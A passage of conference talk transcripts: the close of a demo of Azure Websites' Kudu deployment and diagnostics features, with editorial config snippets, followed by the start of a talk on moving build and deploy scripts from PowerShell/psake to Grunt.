So let me go back and run dir, and you can see that there is this .deployment file here and this deploy.cmd file here. So let me go ahead and open up that .deployment file in Notepad. This is the INI file I mentioned before that we were talking about. You can see here that I'm telling Kudu: the command that you run after you've downloaded all of my source code is deploy.cmd. That's the new file that just got created. So you can create your own, you can override, you can do whatever the heck you want to — you're just overwriting what Kudu does right from this spot. If I open up that deploy.cmd file — oh, nope, I have to spell it right — you can see here this is everything that Kudu does. It looks big, especially when I scroll really fast like that. It's not too bad; it's very well commented. You can see here that essentially it goes through and sets up a bunch of environment variables. These are the variables that you can override from app settings. You can go in and change any one of these. So if you want to change the deployment target, you can go into the portal, add that as an app setting, and that will override this deployment target, because you can see it's checking to see if it's already defined first. So you can define it there. It comes through, and here's where it does the meat of the work. The first thing it does is restore NuGet packages, then it builds into the temporary path, and then it does the sync. This is where it takes all the built files and moves them over into your wwwroot. So that's cool. If you want to change anything about how this works, you can go in there and do it. If you don't want to go hog wild, here's where it's actually calling MSBuild to do the build. You'll notice at the very end of both of these lines, it's passing in this build args. Once again, this is another setting that you could put in your INI file or in your app settings to say: these are additional build arguments that I want passed into MSBuild when I build my site.
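The .deployment file he opens is tiny. Reconstructed from his description — this is the documented shape of the file, but treat it as a sketch rather than his exact contents:

```ini
[config]
command = deploy.cmd
```

As he notes, the generated script checks whether each variable is already defined before setting it, which is why values you put in the portal's app settings win over the defaults baked into deploy.cmd.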
So you don't even have to go this far. I've gone this far in a couple of my sites — that one that I showed you where I was texting myself. Let's go ahead and look at that deploy file. I don't want to run it, I want to edit it. So you can see that in this file, after the standard thing — restoring the NuGet packages, building, blah, blah, blah — I've gone in and added unit tests. So my unit tests basically — oh, here we go, this is the unit test, sorry — really just change directories into where my xUnit runners are. That's just a package. So if I look at my packages, you can see all of the different packages, and the xUnit runner is in there somewhere. I use this little handy trick of using a star here, which you can use with change directory, because I never know what version of the runner I'm going to get, because that all gets handled through NuGet. So I change into whatever version I happen to have, and I run it. And if there's an error, then I exit with an error code and that deployment won't happen. And then I get texted and I'm told that there was an error on the deployment. So that's great. So basically I have a CI server, a continuous delivery server, all in one, with four lines of code that I downloaded from the xUnit website. So that's great. I can create that command file and basically do whatever I want. Now, Kudu does a couple of other things besides just this deployment and building that we've talked about so far. Oh, don't go. We're going to miss you. Have a good day. It does a bunch of debugging and diagnostics and makes that information available for you in ways that would kind of be difficult to do on your own, because you're in the cloud. And that's what the special .scm website is for. So what I'm going to do is come back over here to my browser. I'm going to copy the website that we've been using all along. So this is the NDC demo Azure website.
I'm going to paste it, and all I'm going to do is add .scm into the URL. So every Azure website that you have right now already has this thing enabled. You just don't know about it. And that pulls up this Kudu page, which has all kinds of really useful, interesting things. So the first thing that you'll see is environment, which shows you a bunch of information about the system that I'm running on. I am running on a 64-bit system, but I'm not in a 64-bit process. I have one processor, blah, blah, blah. I can see all of the app settings, the connection strings, the environment variables — all kinds of good, useful stuff for when you get into a jam sometimes. There's also this Process Explorer that I can click on. This is actually an HTML version of Process Explorer. If I hit Control-Shift-Escape, this is my normal task manager that I get for my local machine. I'm now looking at the same kind of thing for my remote machine, just an HTML version of it. I can dig in. You can see my w3wp — that's IIS's worker process running. I can dig in and look at the properties there. I can see all of the threads. I can look at the properties of a thread, et cetera, et cetera. I really like this handles view. If you ever get a locked file, you can see which process is holding on to that file. You can go in and actually kill the process from this UI. So that's kind of cool. There's some other tools too, like you can download a diagnostics dump. If I click on that, it's going to give me a zip file that I can run through with some debugging tools. There is this log stream. Now, this is streaming logging. This is showing me all the logging information that's happening on my website. So if I come back to my website — let's go to a split screen here — as I click around, I go into the Appalachian League and you can see that that log happened. I go back to the home page and you'll see there's the home page. I can go see all the winners.
I'll see the winners. So I could be watching this log as hundreds and thousands of people hit this website, if it was well known, and I could see what's happening live on the website. So that's kind of a cool tool. There's a few other things that are interesting. Oh, webhooks. This is funny. So if you didn't want to use Zapier, this is where you could come and configure your own webhook. You'll see that Zapier has already reached back into Kudu and set itself up as a webhook. But I can type in any URL that I want to right here, and any time a deployment happens, Kudu will post deployment information to that URL. So that could be a local service that you're running in your enterprise to update some dashboard that sits in front of your manager, to let him know that a deployment happened. So that's all good stuff. The last thing that I'll show you — I'll show you two more things in this Kudu. All of Kudu exposes a RESTful JSON-based API so that you can get at this information programmatically. So if I wanted to see the app settings for this website, here they all are in JSON — you can see that I'm just going to /api/settings. If I wanted to see all the deployments that have happened on this website, I can open that up and here are the deployments. I like this files one. This basically gives me the file system that I was looking at over FTP, in a JSON way, and I can just drill through and say, okay, I want to dig into site, and I can follow the link that it gives me for site. I want to dig into wwwroot. I can follow this link to get into wwwroot, and boom, there's my packages.config, my scripts, my snippets, my views, all that kind of stuff, and I can build a whole file browser just using these APIs. And then lastly, Kudu has this debug console. It has a PowerShell version and a cmd.exe version. I told you guys I'm not much of an ops guy, so I shy away from PowerShell. They're trying to tell me it's for developers. I'm not buying it. So I'll just use the good old cmd.exe.
If I come into that, I am actually now looking at a terminal on the machine that my website is running on. And so if I CD into site, not only did I change directories, but you'll notice that the top part, this HTML table, has changed and it follows along with what I'm doing in the command line. Or similarly, if I click on wwwroot, you'll notice that the command down here changes to wwwroot. So I can go in there, I can check things out, I can look at the file system, I can do whatever I want to without having to go into FTP. So this is all quite handy, and something that Kudu gives us, which is nice. Now, everything that I just showed you there might be a little bit scary, because I'm getting a lot of access just by knowing the SCM part of the URL. That's where I want to stop and take a step back. Kudu is interesting. It runs in the same process and the same sandbox and all that stuff, but unlike your actual website, which is not authenticated by default, everything inside of Kudu is. I was just already authenticated, so you guys didn't see the challenge. Now, there's multiple types of credentials that you use in Azure, and this is kind of confusing, but as far as Kudu is concerned there's two, and they're called deployment credentials. So typically when you log into the portal or something, you'll use your Microsoft account, right? Kudu doesn't care about your Microsoft account; it doesn't know anything about it. Instead, it uses either user credentials — you know user credentials from the portal, because on the dashboard you'll see this thing that says reset your deployment credentials. That is a user credential. You have one of those for every single one of your Microsoft accounts, which means if I change the password there, it's not just changing it for my minor league baseball website, it's also changing it for the GitGlimpse website and it's also changing it for that Signatory website, because that set of credentials is stuck to me.
Never give out that set of credentials. They're yours. If you lose control, you go in there and you reset it and it'll reset everywhere. The next one is site credentials. These are ones that are made for you to give out. They're generated for you, but they're specific to a website. So I have four sets of site credentials: one for the minor league baseball website, one for Signatory, one for GitGlimpse, et cetera. They're auto-generated, and you can tell a site credential because it begins with a dollar sign — the username is always a dollar sign and then the name of the site that you're using — and then the password is some long messed-up GUID. You can actually see this, because, if you guys remember, earlier we had to copy and paste something into Zapier, which was that trigger URL. Look at this. You can see the name of my site is NDC demo, and you can see dollar sign NDC demo here. That's that auto-generated username, and you can see here's my password. Kudu is just using HTTP basic auth: when the client makes a request to that URL, it rips those things out of the URL, sticks them into an auth header, and that gets sent off — standard HTTP authentication stuff. But there you can see that. If you download your publish profile — which is available from the dashboard; there's also a link to reset your publish profile credentials, and I could download it as well right here, download your publish profile — that's just an XML file, and if you dug into that XML file you'd find that exact same username and password. And most of the tooling that you'll use that wants to connect to Azure for you will say: give me your publish profile. So you're giving it a set of site-specific credentials, and if you lose control you can reset those as well, but those are site by site. So everything in Kudu — you're good, it's authenticated using one of those ways. Great.
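Everything he pulled out of that trigger URL boils down to standard HTTP Basic auth, which you can reproduce yourself. A sketch with made-up site credentials (the real username is the dollar sign plus your site name, and the real password is that generated GUID from your publish profile):

```shell
#!/bin/sh
# Site credentials are just HTTP Basic auth: base64 of "user:password".
# These values are obviously fake; real ones come from the publish profile.
user='$ndcdemo'   # username is always $ + the site name
pass='pw'
auth=$(printf '%s:%s' "$user" "$pass" | base64)
echo "Authorization: Basic $auth"

# With that header you can hit the JSON endpoints shown in the demo, e.g.:
#   curl -H "Authorization: Basic $auth" https://ndcdemo.scm.azurewebsites.net/api/settings
#   curl -H "Authorization: Basic $auth" https://ndcdemo.scm.azurewebsites.net/api/deployments
# (not executed here, since they need a live site)
```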
So we've looked at a whole bunch of different things that we can do with Kudu and the process, but I want to stop and also think about the ways that we can configure Kudu to do additional things. And it's not even just Kudu, but IIS and .NET and what is afforded to us. So this diagram I made — parts of it should be pretty recognizable to you. Everything in all the blue circles, that is the standard .NET configuration scheme that we've known since day one, right? There's a machine.config, there's a root web.config, those things get merged in, and then you can have web.configs in directories going down farther and farther, deeper and deeper, and they all get merged together into your application. And if you're running on IIS 6 or before, that is the whole story — just the blue, the dark blue, those three. In IIS 7, they added a new configuration file called applicationHost.config. These are IIS-specific settings, and that file gets merged in along with the web root. So now you have IIS and .NET configuration intermingling. In Azure there's yet one more layer, which is these Azure overrides, and these are all of the configuration settings that you've put into the portal. So all of these things come together to give you your final configuration: stuff that you've typed into the portal, your web.config, the applicationHost.config Microsoft gives you. Now, you'll notice that two of these have a little bubble that says XDT. That's the config transform schema that's available. You probably recognize this from Visual Studio: when you create a new project, underneath web.config you have web.debug.config and web.release.config, and you know you can make changes there so that release mode and debug mode look different. That's called XDT. That exact same file format, that schema, is available in Kudu to run on your applicationHost, so you can change IIS settings. So let me show you what that looks like. I'm going to go into Kudu again.
I'm going to go to this — oh, I'm already in the debug console. Great. I'm going to upload a file. So I have this outercurve.svg. This is an image, a scalable vector graphic, so I can zoom in forever and it will always look good. OuterCurve is the foundation, the open source foundation, that Kudu is a part of. I'm going to upload that to the site. I can do that very simply because I'm looking at my wwwroot right now. If I drag this up to the web browser — like I said, it's kind of an FTP client — I can just drop it, and that's going to get uploaded, and now I have outercurve.svg. So if I go back to my site, now I can say slash outercurve.svg. But I get an error. Well, that's because by default IIS doesn't know what to do with SVG files. It's easy enough to change. You just go in and add the file extension and the mime type and you're good to go. But we want to do this in a Kudu way, a way that's reusable. So Kudu allows us to — I'm going to go up one directory so I'm looking at site — it allows us to put one of these transform files in. So I have this applicationHost transform file right here. I'm going to upload that to the site. And now that that's there, I need to restart the site. So let me go to the portal. I'm going to stop the site. I'm going to start the site. Okay, great. The site is starting up now. So because Kudu saw that file, with that name, in that location, when the site restarted it said: hey, this user wants to change applicationHost.config, I'm going to apply that transformation. And I'm going to show you that transformation in a second. But now if I go back to this page and I refresh, you can see I'm getting my outercurve.svg file served to me, because I added that other file in that one spot. So what does that file look like? It's quite simple. This is the entirety of the file. So I'm using the XDT transform. I'm inserting an element: I'm adding any file that ends in .svg to be served with a mime type of image/svg+xml.
I'm also going a step further, because I care about performance, which you'll hear more about tomorrow. I'm saying that for image/svg+xml I want to do HTTP compression. So that's that whole file, and boom, now my whole website can serve SVG files. This is a pretty simple example. And actually, this example I could have just baked right into my web.config and checked it in. No big deal. But Kudu goes a step farther. So here's another example that you might want to use. This is increasing the length of the queue that IIS holds. IIS has a queue — a number of requests that it will hold on to — and once you go past that queue, it will start issuing 503 responses. It will say service unavailable. I think that number by default is a thousand. In this example, we are once again doing a change. We're changing an attribute — that's what the SetAttributes does. I'm changing it to 5,000, so more people will wait longer before they get service unavailable on my site. But notice there's this XDT site name token that's surrounded by percent signs. There's a token there. What's cool about these applicationHost.xdt files that I can upload to Kudu is that it will scan them for certain tokens and replace them with runtime variables, which means this file I can now upload to any website that I want to, because the name of the site, which normally would have been hard-coded, is now a variable. And you can see there's a couple of different things: there's a site name, there's the app pool name, there's an extension path, et cetera, et cetera. That one difference, that one thing that Kudu does, opens up a really interesting universe to us. So let me show you another file. This file is going to add something that Kudu calls a site extension. What a site extension is, is really just us leveraging the power of virtual directories, which I've never really used before. But now I can take this file.
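The first transform he describes — the SVG mime type plus compression — isn't captured in the transcript, but reconstructed from his description it would look roughly like this. Element placement is my best guess at where these settings live in applicationHost.config, so treat it as a sketch rather than his exact slide:

```xml
<?xml version="1.0"?>
<configuration xmlns:xdt="http://schemas.microsoft.com/XML-Document-Transform">
  <system.webServer>
    <staticContent>
      <!-- serve .svg files with the right mime type -->
      <mimeMap fileExtension=".svg" mimeType="image/svg+xml"
               xdt:Transform="Insert" />
    </staticContent>
    <httpCompression>
      <staticTypes>
        <!-- and compress them, since SVG is just XML text -->
        <add mimeType="image/svg+xml" enabled="true" xdt:Transform="Insert" />
      </staticTypes>
    </httpCompression>
  </system.webServer>
</configuration>
```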
You guys can literally copy and paste this from my slides, change these two variables where it says extension name, and we can start to put things into Kudu ourselves that are authenticated. So we can give our administrators a place to administer the website completely: stuff that is site-specific, like what I've already showed you in the Kudu website, and stuff that is important for our app. So let me show you some examples of this. Actually, you know what, no, let me make sure that this is really hitting home. So this is an Azure website in an architecture diagram. There's the user site that sits on top. There's a buddy site right next to it, right? That's kind of what site extensions are. The site I've already been showing you is actually a Kudu site extension. It's just this virtual directory kind of thing. And Microsoft installs some of them for you by default. So Kudu, we've already looked at. Visual Studio Online, you might have seen. Web Deployer, Web Jobs, you might have seen. Microsoft puts those there. And if you want to partner with Microsoft and call them and have one built in, they allow for that. But we're not going to do that. We're just regular users and we're not trying to change the way Azure works in general. Instead, we can either install an existing one or we can upload our own. So let me go back to Kudu. And I'm going to come over here to site extensions. And you can see that from my site, I'm on the installed tab and I don't have any extensions available. So I can go to the gallery. Now, this morning when I did my run through, there was an additional option here that put in an IIS log analyzer that would tell me where my traffic comes from and how many hits I have and all these kinds of things. It's gone. Which stinks for you guys because it's kind of cool looking. But it's actually a teachable moment because you can kind of see already where Microsoft is going with this.
The reason why it's gone, and I had to dig through the Kudu source code to figure this out, is because all of these things are just NuGet packages. And it's fed by some private NuGet feed somewhere that Microsoft controls. And the one I wanted to show you was a package on there. And they've removed that package from the feed. That's fine. I'll install another one. It's less impressive, but it'll still give you the point. I'm going to install this file counter. The source for this one is available on the Internet. It's the only one that I know that source is available for. I'm going to press install. And you see I get this little thing that says restart the site. There's actually a bug with restarting the site. Both in the portal and on the site extensions. So I'm just going to stop and start. That's kind of the way to make sure that it really restarts. And so now that I've done that, I have this little play button available on file counter. And file counter is amazing. You ready? I press play. Oh, hold on. It's still starting up. Told you it's amazing. Okay. There we go. The world's most amazing file counter. Your site has 539 files. All this is is a tiny little website that knows where it's sitting and it counts all the files that sit inside of my wwwroot. Spits that back. Not very useful, but you can make it do anything that you want to. Let me show you one that's a little bit more useful for our application. And obviously I can come in here and I can uninstall this thing. And you can imagine a world where there's all these admin tools. I'm not a PHP guy, but phpMyAdmin is very full featured. And if this were a PHP website, that would be kind of cool to show you. So what I've done is on our minor league baseball website here, every year the winner of mascot mania changes. So this year it's this guy here, LouSeal from the Columbus Clippers. And you can see that he's kind of the hero of the website. He's the big picture that you see.
And the administrators of this website are constantly saying, hey, there was a new mascot. Can we change it? And I have to go in there and I have to change the code. So what I want to do is I want to give them an administrative tool. But there's no authentication on this website. I don't want to build out authentication. I just want them to be able to use the credentials they already have with Azure to log in. So what I've done is I've created this simple little file, default.aspx. And this is like, I've made it really simple and ugly on purpose because I don't want you guys to focus on the code. But essentially what it does is there's an if statement. If it's a GET request, I build up an HTML form that has a select, where I'm looping through and writing a bunch of options. And if it's a POST, I do some updates to the database. What's important to note is because I'm running in context of the website, I can still get the configuration manager to give me the data context. I have access to all the variables that the website is already using, so I don't have to ask for any input. So to install this, I have created this applicationHost.xdt. This is the exact same thing that I'm showing you here, except for the word extension name has been replaced by hero. And so I'm going to take these two files, and I'm going to upload them. So I'm going to come back to the Azure portal. I'm going to go to the debug console because that's the easiest way to upload things. And you'll notice that there's a new directory now that I installed the site extension, right next to site, called site extensions. So that's fine. Once again, this just follows the convention. I'm going to add a new folder called hero. I'm going to go inside of hero. I'm going to upload these two files, drop them. Boom, they're there. Once again, I made a change here. I need to restart the web app. So let me stop it and start it. Okay. So if I go back and look at my mascots, I'm refreshing.
It's going to take a little bit because of the JIT, but we'll still see LouSeal as the main winner of the mascot contest. Wow. Come on. Come back up, Azure. They promised me that this restart thing has been fixed in the new portal, but we'll see. Yes, because deployments, the question is could you use deployment slots? And the answer is yes, because the deployment slots are still spinning up and the process is new, and so Kudu, when it spins up, will do all the configuration stuff. Yeah. So since I named this hero, I should be able to go to hero. Okay. Now my website is really dead. Let's see what's going on together. Wow. Really dead. I'm not even getting console. Well, this is fun. I am stopping and starting the right website. Okay. Well, let's do this. I could check the logs, but I'm not going to go spelunking through all that stuff with you guys here. So let me try one thing. Let me. Okay. This is good. The fact that I got this far is great. This is a good sign that this is working now. That's not a good sign. I'm wondering if I screwed up something in my file. Come on, guys. This is the big demo. This is the one where you're on the edge of your seat, right? I've never screwed this up before. Oh, man, Azure is really killing me here. Okay. You know what? I have another option. We're going to use all the tools that we've learned about in this talk right here right now. Just pretend that I meant for this to happen and it would be awesome. I'm going to use FTP and see if I can even FTP in. So like I told you earlier, this stuff is rough around the edges right now. I can go into the site. Nope. Oh, interesting. The site is back. Hey, thank you. You can hit it, but I can't. You might be coming up here to finish this demo, buddy. Well, okay. So the point here is what's supposed to happen is can you, oh, you can't hit this URL because you can't authenticate this. Let me try another browser. Good call, Anthony Van Der. Hey, hey, hey, hey. That's what you wanted.
Okay. Is this one? Everybody hold your breath. So what we have here now is in Hero. This is the admin thing. This is that super simple page I showed you. I have a drop down of all of the different mascots and I can pick who was the winner. So who am I going to pick, guys? Come on, Ballapeño, of course. So Ballapeño, I hit submit. That's now updated. If I could get the website to run, which it is, if I hit refresh now, Ballapeño. Stuck the landing, so, so. You guys are cruel. You only laugh when I call myself fat and when I fail. I understand Norway. So that is the bunch of the stuff that I wanted to show you guys about Azure and the different things that you can do. Now here's the big secret that I've learned screwing around with all this. Even in that moment of panic, I did not plan that, I swear. Even in that moment of panic, I felt safe. And the big secret to me to Azure websites and why you can feel safe goes like this. I'm a chef. I like to cook a lot at home and whenever I talk to people who are my friends who want to cook, they say, oh, I don't know how to cook and what if I ruin the meal or whatever. Here's the deal. If you ruin a meal, it's 20 bucks and you can get pizza and you save the meal. When I was working on hardware in that back closet, I was always afraid because what if I screwed up the hardware? It's thousands and thousands of dollars. Let me show you what happens if you screw up the website in Azure websites. One button, done. I've just deleted the website, the SQL server, everything gone and I can recreate it in 30 minutes. That's the big secret. You don't have to be afraid because it's that fast to reset. It's a couple of bucks, it's a couple of minutes and you can reset yourself. So that is what I wanted to share with you guys today. I have two minutes for questions if there are any. Awesome. Guys, thank you very much. I hope to see you tomorrow. Tweet me if you have any more questions. Thank you. Thank you.
Microsoft’s premier cloud solution for custom web applications, Windows Azure Web Sites, has brought the DevOps movement to millions of developers and revolutionized the way that servers are provisioned and applications deployed. Included with all the headline functionality are many smaller, less-known or undocumented features that serve to greatly improve developer productivity. Join Microsoft MVP and veteran web developer Nik Molnar for a whirlwind tour of these secret features and enhance your cloud development experience. This beginner session is suitable for developers both using and curious about WAWS.
10.5446/50627 (DOI)
Okay, thank you all for coming to my talk. Are you sure you want to be here? Douglas Crockford is speaking, Mark Seemann is speaking. You know, some great speakers out there. Do you want to really be here? So this is a talk about the journey from PowerShell to Grunt for our build and deploy. Okay, my name is Paul Stack. I have some contact details on the screen. If anybody takes offense with what I say or wants to discuss it further, then please do get in contact with me. I'm an infrastructure engineer for OpenTable. After the last session, someone said, what does an infrastructure engineer do? I don't know. I seem to be away from the office an awful lot and I have an amazing team who are building very cool tools for our infrastructure based around using Puppet for orchestration of changes to our production systems. I'm a DevOps extremist. Over the past six, seven years, I loved CI. After CI, I thought there's got to be something else and then I really got into continuous delivery and in order to understand continuous delivery better, I started looking more towards DevOps and getting into the DevOps world and now I just believe that it's the only way that companies can truly succeed in delivering amazing software in the best manner. I'm a conference junkie. This is my eighth conference of this year, and it's only June. I feel as though I should go to a support group so that I can go, my name's Paul. It's been two weeks since my last conference. I enjoy going and meeting lots of new people. This is a description of where we were, where we went, and where we're at now. We're going to be showing lots of code examples so people can see them. There's a ton of our code that's already open sourced. You'll actually be able to see a lot of what we've already written. In the beginning, when I started at OpenTable, just short of three years ago, we had a custom written build tool.
It was a proprietary piece of software that was a little console application that required to be installed onto a build server. It was written in C# and ASP.NET 2. It's probably not the best thing, if we look at it now, for a build tool. Back then, it was really good because it was interacting with our Git or SVN repository back then. Who still uses SVN? It was interacting with our SVN repository and being able to pull tags and it was being able to create tags for us and so on. It was extremely versatile because it took care of things like our own internal web.config transformation. Our main website has got nine different variants of it, different languages across the world. This little tool managed to swap all the different web.config pieces into the right place when required. It was actually very good. It became extremely difficult to maintain. What we did is we had a build server, one build server. On that build server was this console application. Also, on that build server was Visual Studio. It became very difficult to maintain. We thought, let's start moving away from that. This was a central agent for all the builds across our web platform. This was quite a big deal. We had a lot of builds going on. When that server went down, that agent, we were in real trouble. We had the rise of PowerShell. I'm a huge fan of PowerShell. I always have been a huge fan of PowerShell. If people can understand what I'm actually saying, that's Microsoft PowerShell. It's just my silly accent. Over the next couple of months after I joined the company, my team really, we became responsible for building a new web application. The application was an ASP.NET MVC app. The old tool didn't build that app. That's when we realized that things had to change. We needed to create new scripts. I had just come from a previous company where I had just gone and implemented an entire new build system. Actually, in MSBuild. Looking back, I don't know why I'd ever choose MSBuild.
I guess any MSBuild developers, anybody like MSBuild? By need. Who likes the brackets? Everyone loves a bracket. I started to realize how amazing PowerShell was and how versatile it was for Windows infrastructure. On top of PowerShell, there is a DSL, a domain-specific language, called psake. It is not pronounced P-sake as everybody that I meet does. It's a silent P. It's got a very similar style to rake. You describe things in tasks. The best thing about it is it avoids the angle bracket tax of MSBuild. Does anybody know psake? I know a couple over there do. It's a pretty awesome tool. It was originally written by a guy called James Kovacs as a version 1.0. Then it was re-released by Jorge Matos as a version 2. As I said, I was creating things in MSBuild for a long time. I spent many sleepless nights trying to work out why my build scripts didn't work. It was because of brackets. Brackets and escaping of characters. DSLs are a lot easier to use and they are a little bit more fluid. They just make things a little bit better. Why psake and not rake? I'm a reformed Microsoft fanboy. I used to be a huge fanboy and it was all about Microsoft tools for me. Because of that, I hated, I detested Ruby. I write Ruby on a regular basis now. I'm completely changed. PowerShell had to be the way forward. If it wasn't MSBuild, and it had to be Microsoft, it had to be PowerShell. I know somebody in the crowd has written their own build script tool. This was going back like three years ago. I didn't know many other tools existed then. With all the power that PowerShell actually brings, it is extremely versatile at what it can do for builds and deploys. PowerShell has remoting for your deployments. You can start jobs, you can set process waits, et cetera, on your build. It becomes really good. The scripts look like what follows. We have a repository. I don't know the last time somebody was actually maintaining this. Originally, it was created two years ago.
We did all sorts of cool stuff, but our build script effectively looked like this. We passed in some properties. We had some configuration, which was like the type of configuration, so if it's debug or release or so on and so forth. Solution directories, solution names, project names, whether it's actually, whether it's going to be packaged or published or whether this is a part build, the build number. It just started to grow exponentially. If you look at the git blame of this file, you'll see that probably five or six different people have been touching pieces of it and breaking everything. We'll discuss why that's the problem later. It was really easy. We had a task default, which depends on build, unit test, and acceptance tests. The build basically said run MSBuild. We had a wrappers file, which I'll actually show you. The wrappers file is where all the nastiness is. There we go. Run MSBuild. Again, this has gotten horrendous over time. We would switch based on configuration. Because you're inside PowerShell and you can connect to all the pieces of the system, we could just use exec MSBuild. We could actually trigger, from PowerShell, an MSBuild script. Then you pass in all the parameters and then we actually use the output parameters to TeamCity to tell us when the build was ready and so on. But we'll come back to that later. After it finished the build, it would then go through a series of steps based on the crap that people added to the script. I say that in the most light-hearted sense of the word crap. It just so happened that these scripts other people wanted to use. I made the biggest cardinal mistake. I made these a separate repository of their own. They were not part of my application. So therefore anybody in the company who wanted to could go and change those scripts. That was my worst mistake. We'll discuss why that was a bad mistake.
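The task-plus-dependencies model that psake borrows from rake (and that grunt uses too, later in this talk) can be sketched in a few lines of plain JavaScript. This is a toy illustration of the pattern, not psake itself: a task declares the tasks it depends on, the runner executes each dependency once before the task's own body, and so a `default` task depending on build, unit test, and acceptance tests behaves like the script described above.

```javascript
// Toy task runner: illustrates the task/depends pattern shared by
// psake, rake, and grunt. Task names below are made up for the example.
const tasks = {};

function task(name, deps, fn) {
  tasks[name] = { deps, fn, done: false };
}

function run(name) {
  const t = tasks[name];
  if (!t || t.done) return;       // each task runs at most once
  t.deps.forEach(run);            // run dependencies first, like -depends
  t.fn();
  t.done = true;
}

const log = [];
task('build', [], () => log.push('msbuild'));
task('unitTest', ['build'], () => log.push('nunit'));
task('acceptanceTest', ['build'], () => log.push('acceptance'));
task('default', ['build', 'unitTest', 'acceptanceTest'], () => log.push('done'));
```

Calling `run('default')` runs the build once, then both test tasks, then the default body, which is exactly the dependency chain the psake script declares.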
Then at the end, if it was a, if you wanted to package it, it would go off and package the build. It would checksum the DLLs and it would checksum the package. We want to make sure that the package, when we package that up for the first time, we want to record a checksum and then when we deploy, we used to actually check that that checksum was the same, because we're a SOX-controlled company and you have to prove that what you built and tested is exactly what is released. I don't know. Then we ran some unit tests. We had another wrapper called run unit tests. Maybe not. They're in there somewhere. We just basically passed in some configuration values of where the NUnit exe is, because we used to use NUnit, and we would pass in the directory that you would run tests against. Then we actually just passed in a couple of extra parameters where we said unit-test-result.xml. We want to get the result back so that we can feed that into TeamCity. Then we passed in the type of test, unit test. Looking back, that can 100% be refactored to the same method, just having a wrapper and passing the types in rather than copying and pasting. We wanted to separate the fact that there were unit tests and there were acceptance tests and we wanted people to see that. We wanted to see that there was a distinct difference. The build script in itself was extremely simple. That's what PowerShell gave us. The psake notation gave us that simplicity. When it came to deployments, it became even more simple. We originally just started deploying this in a very small scale. We would just basically say get the site directory, get the package directory, the deploy folder. You would just change some, this is just like configuration, swap in the correct configuration into place. Then we would just copy the folder across the network share onto the server and then we would remove all the temporary deploy and then we would actually just do an IIS reset. We would swap the system into place.
As soon as we had swapped it into place, we'd do an IIS reset and then clean up. That is not a good deployment plan. It's really not a good deployment plan. That was like a V1 and that one was added two years ago. Then we started to get a little bit more involved with deployment. We had pre-deployment. We had setting load balancer statuses. We had warm-ups. We had going off and getting our artifacts. In pre-deployment, you see, we started to become much more professional with our PowerShell scripts right here, passing in help messages so that people could see what they needed to pass in. It was go off and get your system from Artifactory. We use Artifactory for our packages. When you get, let me just go to the bottom, deploy site. Deploy site would basically say for each server in the list, because we could pass in a comma-delimited string of servers, for each one in the list, go off, get the files, extract the files to the server. Does that make sense? Really simple. We're not doing anything bad. After deploy site, we would then call the deploy configuration, which would go off and it would swap in the correct configuration based on whether it was production in America or production in Japan. It would go and get the correct configuration values and put those in place as well. That was our pre-deployment. Then we would take the server off the load balancer. We would go off and we would interact with SQL Server to take our server completely out of the load balancer. When it went off the load balancer and we got a good exit code, a zero exit code, that it's worked, we would then do the final step, which would be the actual deployment in itself. All we did was call final deploy.ps1, which effectively swapped the folder systems around. We would take the old one, we would rename it to be old or backup or temp, and we would take the new one and rename it to be the actual folder itself. We would do an IIS reset on that.
Again, that is not a good deployment plan. This is going back like two years ago. We were very much, as a company, at the beginning of our continuous integration and continuous delivery start. It's something that takes an awful long time to implement because each environment has got its own different way of doing things, and each environment has its own stakeholders that you have to consult in order to build that pipeline. This was the first phase of it. We actually moved from a company that did manual deploys of these packages that this old C# application created, to starting now to have a real sort of a pipeline. I call it a sort of a pipeline. Anybody any questions on those scripts? Does anybody want those scripts? You want them? We were 100% Microsoft, so that is exactly why there was no need for anything else. It was MSBuild and PowerShell or nothing. That was okay. We hired ASP.NET developers. Our developers all had core C# knowledge. We didn't have anybody inside the company who was really pushing the bounds of other languages anyway. But yes, it wasn't cross-platform in any way, shape, or form. If you do want these scripts, let me know. You can have them. I won't even charge you for them. We could do all other sorts of things in here. If I show you some of our warm-up scripts, sending requests across, making sure that a GET request returns a 200, and that the application warms itself up as part of the deployment. Our pipeline actually became quite good, and it looked something similar to... Sorry, that's the wrong one. We would pre-deploy the site, and then we would deploy the site. Based on parameters that we passed in, we could then say, and also warm the site up. Run that part of the script as well. Very quickly, because of so many people... There we go. Because of so many people touching this, let's go back to the actual slides. The scripts look okay. Fundamentally, there's nothing wrong with them.
It's probably not the best way of doing it. As I said, people started to adapt them. One person would go, but my app needs to do this. Let's add a little if statement in there. If it's my app, then I'll do it this way. My app has this build configuration parameter. Let's add that into the case statement. All SOLID principles are going out the window right there. Very quickly, we get into a massive spaghetti mess, huge spaghetti mess. We ended up with a build in our system that takes 17 build parameters. All sorts of rubbish going in there. We'd have deploy directories. We'd have branches because people were using branches for their things. You'd have project names. You'd have some package locations, some artifacts. You'd have some hard-coded IPs. You'd have whether it's a service or a web app. It just became an absolute maintenance nightmare. But rewrites completely suck. Anybody been involved in a software rewrite? Has it been fun? Have you wanted to pull your teeth out? Yeah, they're not fun. They're really, really not fun. I'd already written one set of build scripts. Why was I going to put us through writing another set of build scripts? Do we really want another? Then we had a bit of a revolution in the company. We were no longer a Microsoft house. We were actually able to start writing applications in other languages. In the summer of 2013, we had an engineer join us called Andy Royal. Luckily, I managed to get him on loan to my team for the first couple of months. We had just started to write a Node.js app. Somebody told me I could write a new application. I was going to choose a new language. I was unleashed. Andy wanted to learn grunt. Andy then decided why don't we start writing the build system in grunt? It's a new shiny thing. This was a year ago. None of the other ones had really come out yet. We'll look at some of the other ones a bit later. For anybody who doesn't know, grunt is a JavaScript-based task runner.
You register tasks and then you can call those tasks in place. It's got a massive community ecosystem. When I rewrote the talk this morning, there were 2,954 grunt plugins available. There's new ones appearing every day. Now, you go and search for a screenshot or share or something like that. You'll probably get 20 variations of different packages, but there's a huge community present. Of course, grunt works really well with Node. You do npm install grunt and you'll actually be able to start interacting with your Node application from it. What do the scripts look like? Right. Everything has a Gruntfile. We'll skip that top part. That's not really relevant. We go off and we go to a directory and we can say, for every JavaScript file in that directory, register that file itself that you find as a function, as a task that's available. At that point, you don't have to register everything explicitly. You can let recursion happen and let it register all its own tasks. Then we can say, but register a task of default. If somebody is in my directory and types grunt, it'll do the build. If somebody runs grunt build, it'll do a clean build, a JSHint, it'll run my Mocha unit tests and it'll copy the build across for packaging. If somebody just wants to run Mocha, what our Mocha tests are actually doing here is using an in-memory database. It's actually filling the database with known data and running acceptance tests against that data. It will clear the database down and refill it. If you want to retest your code, you wouldn't want the process to start again. The last one is, if you're just in development mode, you can just run JSHint and Mocha. Let's have a look. 